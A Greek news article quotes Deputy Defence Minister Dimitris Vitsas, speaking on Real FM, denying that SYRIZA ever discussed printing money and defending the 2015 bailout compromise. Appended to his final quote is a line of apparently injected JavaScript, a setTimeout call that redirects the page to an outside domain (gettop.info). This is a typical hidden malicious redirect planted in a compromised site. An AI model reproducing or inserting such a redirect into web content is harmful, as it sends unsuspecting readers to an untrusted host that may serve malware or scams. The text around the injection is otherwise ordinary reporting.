Βίτσας: Ποτέ δεν συζητήθηκε στον ΣΥΡΙΖΑ το ενδεχόμενο να τυπωθεί χρήμα

0
11

 

«Ποτέ στον ΣΥΡΙΖΑ δεν συζητήθηκε, ούτε σε πολιτικό ούτε σε κυβερνητικό επίπεδο, να τυπώσουμε χρήμα» δήλωσε ο αναπληρωτής υπουργός Εθνικής Άμυνας, Δημήτρης Βίτσας.

Μιλώντας στον ραδιοσταθμό Real FM, σχολιάζοντας τα όσα αναφέρονται στο βιβλίο του Γάλλου προέδρου Φρανσουά Ολάντ σχετικά με τον Ρώσο πρόεδρο Βλ. Πούτιν και την περίοδο του Ιουλίου του 2015 στην Ελλάδα ανέφερε: «Τις σκοπιμότητες μιας τέτοιας συγγραφής δεν μπορώ να τις ξέρω».

Ο κ. Βίτσας υπενθύμισε ότι «το πρώτο εξάμηνο του 2015 δώσαμε μια πολύ μεγάλη μάχη – όχι απλώς δύσκολη – αλλά και με λίγα όπλα, ακριβώς γιατί είχε προετοιμαστεί από καιρό μια λογική αριστερής παρένθεσης.

Αυτή η μάχη οδήγησε σε ένα συμβιβασμό. Όταν μιλάει κάποιος για συμβιβασμό, αυτός εμπεριέχει και την έννοια της ήττας. Σημασία έχει αν ο συμβιβασμός αυτός σου δίνει τη δυνατότητα να σταθείς όρθιος, να διεκδικήσεις, και από κει και πέρα να είσαι μέσα στη μάχη. Νομίζω ότι αυτό καταφέραμε, και αυτό είναι και η καινούργια ελπίδα μέσα από δυσκολίες τις οποίες κανένας δεν αμφισβητεί.

Όχι μόνο μέσα από κυβερνητικές δυσκολίες, αλλά και κοινωνικές δυσκολίες. Δυσκολίες που από την πλευρά της αξιωματικής αντιπολίτευσης βγαίνουν, όχι με λάθος, αλλά με ψευδή τρόπο. Μέσα από κει μπορούμε να δούμε, και βλέπουμε ήδη, κάποιες καλυτερεύσεις, ιδιαίτερα σε ζητήματα προστασίας των πιο φτωχών» ανέφερε ο κ. Βίτσας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here